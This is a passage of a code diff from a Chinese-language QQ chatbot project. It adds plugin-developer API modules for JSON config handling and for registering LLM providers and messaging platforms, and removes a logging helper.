|
||||
return func(*args, **kwargs)
|
||||
except Exception as e:
|
||||
if i == n-1: raise e
|
||||
logger.warning(f"函数 {func.__name__} 第 {i+1} 次重试... {e}")
|
||||
return wrapper
|
||||
return decorator
|
||||
|
||||
|
||||
def run_monitor(global_object: GlobalObject):
|
||||
'''
|
||||
监测机器性能
|
||||
- Bot 内存使用量
|
||||
- CPU 占用率
|
||||
'''
|
||||
start_time = time.time()
|
||||
while True:
|
||||
stat = global_object.dashboard_data.stats
|
||||
# 程序占用的内存大小
|
||||
mem = psutil.Process().memory_info().rss / 1024 / 1024 # MB
|
||||
stat['sys_perf'] = {
|
||||
'memory': mem,
|
||||
'cpu': psutil.cpu_percent()
|
||||
}
|
||||
stat['sys_start_time'] = start_time
|
||||
time.sleep(30)
|
||||
11
util/log.py
@@ -1,11 +0,0 @@
|
||||
import logging
|
||||
from logging.handlers import RotatingFileHandler
|
||||
import colorlog
|
||||
|
||||
logger = logging.getLogger("QQChannelChatGPT")
|
||||
logger.setLevel(logging.DEBUG)
|
||||
handler = colorlog.StreamHandler()
|
||||
fmt = "%(log_color)s[%(name)s] %(message)s"
|
||||
handler.setFormatter(colorlog.ColoredFormatter(
|
||||
fmt))
|
||||
logger.addHandler(handler)
|
||||
5
util/plugin_dev/api/v1/bot.py
Normal file
@@ -0,0 +1,5 @@
|
||||
from type.plugin import PluginMetadata, PluginType
|
||||
from type.register import RegisteredLLM, RegisteredPlatform, RegisteredPlugin, RegisteredPlugins
|
||||
from type.types import GlobalObject
|
||||
from type.message import AstrMessageEvent
|
||||
from type.command import CommandResult
|
||||
82
util/plugin_dev/api/v1/config.py
Normal file
@@ -0,0 +1,82 @@
|
||||
from typing import Union
|
||||
import os
|
||||
import json
|
||||
|
||||
def load_config(namespace: str) -> Union[dict, bool]:
|
||||
'''
|
||||
从配置文件中加载配置。
|
||||
namespace: str, 配置的唯一识别符,也就是配置文件的名字。
|
||||
返回值: 当配置文件存在时,返回 namespace 对应配置文件的内容dict,否则返回 False。
|
||||
'''
|
||||
path = f"data/config/{namespace}.json"
|
||||
if not os.path.exists(path):
|
||||
return False
|
||||
with open(path, "r", encoding="utf-8-sig") as f:
|
||||
ret = {}
|
||||
data = json.load(f)
|
||||
for k in data:
|
||||
ret[k] = data[k]["value"]
|
||||
return ret
|
||||
|
||||
def put_config(namespace: str, name: str, key: str, value, description: str):
|
||||
'''
|
||||
将配置项写入以namespace为名字的配置文件,如果key不存在于目标配置文件中。当前 value 仅支持 str, int, float, bool, list 类型(暂不支持 dict)。
|
||||
namespace: str, 配置的唯一识别符,也就是配置文件的名字。
|
||||
name: str, 配置项的显示名字。
|
||||
key: str, 配置项的键。
|
||||
value: str, int, float, bool, list, 配置项的值。
|
||||
description: str, 配置项的描述。
|
||||
注意:只有当 namespace 为插件名(info 函数中的 name)时,该配置才会显示到可视化面板上。
|
||||
注意:value一定要是该配置项对应类型的值,否则类型判断会乱。
|
||||
'''
|
||||
if namespace == "":
|
||||
raise ValueError("namespace 不能为空。")
|
||||
if namespace.startswith("internal_"):
|
||||
raise ValueError("namespace 不能以 internal_ 开头。")
|
||||
if not isinstance(key, str):
|
||||
raise ValueError("key 只支持 str 类型。")
|
||||
if not isinstance(value, (str, int, float, bool, list)):
|
||||
raise ValueError("value 只支持 str, int, float, bool, list 类型。")
|
||||
path = f"data/config/{namespace}.json"
|
||||
if not os.path.exists(path):
|
||||
with open(path, "w", encoding="utf-8-sig") as f:
|
||||
f.write("{}")
|
||||
with open(path, "r", encoding="utf-8-sig") as f:
|
||||
d = json.load(f)
|
||||
assert(isinstance(d, dict))
|
||||
if key not in d:
|
||||
d[key] = {
|
||||
"config_type": "item",
|
||||
"name": name,
|
||||
"description": description,
|
||||
"path": key,
|
||||
"value": value,
|
||||
"val_type": type(value).__name__
|
||||
}
|
||||
with open(path, "w", encoding="utf-8-sig") as f:
|
||||
json.dump(d, f, indent=2, ensure_ascii=False)
|
||||
f.flush()
|
||||
|
||||
def update_config(namespace: str, key: str, value):
|
||||
'''
|
||||
更新配置文件中的配置项。
|
||||
namespace: str, 配置的唯一识别符,也就是配置文件的名字。
|
||||
key: str, 配置项的键。
|
||||
value: str, int, float, bool, list, 配置项的值。
|
||||
'''
|
||||
path = f"data/config/{namespace}.json"
|
||||
if not os.path.exists(path):
|
||||
raise FileNotFoundError(f"配置文件 {namespace}.json 不存在。")
|
||||
with open(path, "r", encoding="utf-8-sig") as f:
|
||||
d = json.load(f)
|
||||
assert(isinstance(d, dict))
|
||||
if key not in d:
|
||||
raise KeyError(f"配置项 {key} 不存在。")
|
||||
d[key]["value"] = value
|
||||
with open(path, "w", encoding="utf-8-sig") as f:
|
||||
json.dump(d, f, indent=2, ensure_ascii=False)
|
||||
f.flush()
|
||||
|
||||
|
||||
|
||||
|
||||
6
util/plugin_dev/api/v1/llm.py
Normal file
@@ -0,0 +1,6 @@
|
||||
'''
|
||||
大语言模型.
|
||||
|
||||
插件开发者可以继承这个类来做实现。
|
||||
'''
|
||||
from model.provider.provider import Provider as LLMProvider
|
||||
10
util/plugin_dev/api/v1/message.py
Normal file
@@ -0,0 +1,10 @@
|
||||
from astrbot.core import oper_msg
|
||||
from type.message import AstrMessageEvent, AstrBotMessage
|
||||
from type.command import CommandResult
|
||||
from model.platform._message_result import MessageResult
|
||||
|
||||
'''
|
||||
消息处理。在消息平台接收到消息后,调用此函数进行处理。
|
||||
集成了指令检测、指令处理、LLM 调用等功能。
|
||||
'''
|
||||
message_handler = oper_msg
|
||||
11
util/plugin_dev/api/v1/platform.py
Normal file
@@ -0,0 +1,11 @@
|
||||
'''
|
||||
消息平台。
|
||||
|
||||
Platform类是消息平台的抽象类,定义了消息平台的基本接口。
|
||||
消息平台的具体实现类需要继承Platform类,并实现其中的抽象方法。
|
||||
'''
|
||||
|
||||
from model.platform._platfrom import Platform
|
||||
|
||||
from model.platform.qq_gocq import QQGOCQ
|
||||
from model.platform.qq_official import QQOfficial
|
||||
64
util/plugin_dev/api/v1/register.py
Normal file
@@ -0,0 +1,64 @@
|
||||
'''
|
||||
允许开发者注册某一个类的实例到 LLM 或者 PLATFORM 中,方便其他插件调用。
|
||||
|
||||
必须分别实现 Platform 和 LLMProvider 中涉及的接口
|
||||
'''
|
||||
from model.provider.provider import Provider as LLMProvider
|
||||
from model.platform._platfrom import Platform
|
||||
from type.types import GlobalObject
|
||||
from type.register import RegisteredPlatform, RegisteredLLM
|
||||
|
||||
def register_platform(platform_name: str, platform_instance: Platform, context: GlobalObject) -> None:
|
||||
'''
|
||||
注册一个消息平台。
|
||||
|
||||
Args:
|
||||
platform_name: 平台名称。
|
||||
platform_instance: 平台实例。
|
||||
'''
|
||||
|
||||
# check 是否已经注册
|
||||
for platform in context.platforms:
|
||||
if platform.platform_name == platform_name:
|
||||
raise ValueError(f"Platform {platform_name} has been registered.")
|
||||
|
||||
context.platforms.append(RegisteredPlatform(platform_name, platform_instance))
|
||||
|
||||
def register_llm(llm_name: str, llm_instance: LLMProvider, context: GlobalObject) -> None:
|
||||
'''
|
||||
注册一个大语言模型。
|
||||
|
||||
Args:
|
||||
llm_name: 大语言模型名称。
|
||||
llm_instance: 大语言模型实例。
|
||||
'''
|
||||
# check 是否已经注册
|
||||
for llm in context.llms:
|
||||
if llm.llm_name == llm_name:
|
||||
raise ValueError(f"LLMProvider {llm_name} has been registered.")
|
||||
|
||||
context.llms.append(RegisteredLLM(llm_name, llm_instance))
|
||||
|
||||
def unregister_platform(platform_name: str, context: GlobalObject) -> None:
|
||||
'''
|
||||
注销一个消息平台。
|
||||
|
||||
Args:
|
||||
platform_name: 平台名称。
|
||||
'''
|
||||
for i, platform in enumerate(context.platforms):
|
||||
if platform.platform_name == platform_name:
|
||||
context.platforms.pop(i)
|
||||
return
|
||||
|
||||
def unregister_llm(llm_name: str, context: GlobalObject) -> None:
|
||||
'''
|
||||
注销一个大语言模型。
|
||||
|
||||
Args:
|
||||
llm_name: 大语言模型名称。
|
||||
'''
|
||||
for i, llm in enumerate(context.llms):
|
||||
if llm.llm_name == llm_name:
|
||||
context.llms.pop(i)
|
||||
return
|
||||
5
util/plugin_dev/api/v1/types.py
Normal file
@@ -0,0 +1,5 @@
|
||||
'''
|
||||
插件类型
|
||||
'''
|
||||
|
||||
from type.plugin import PluginType
|
||||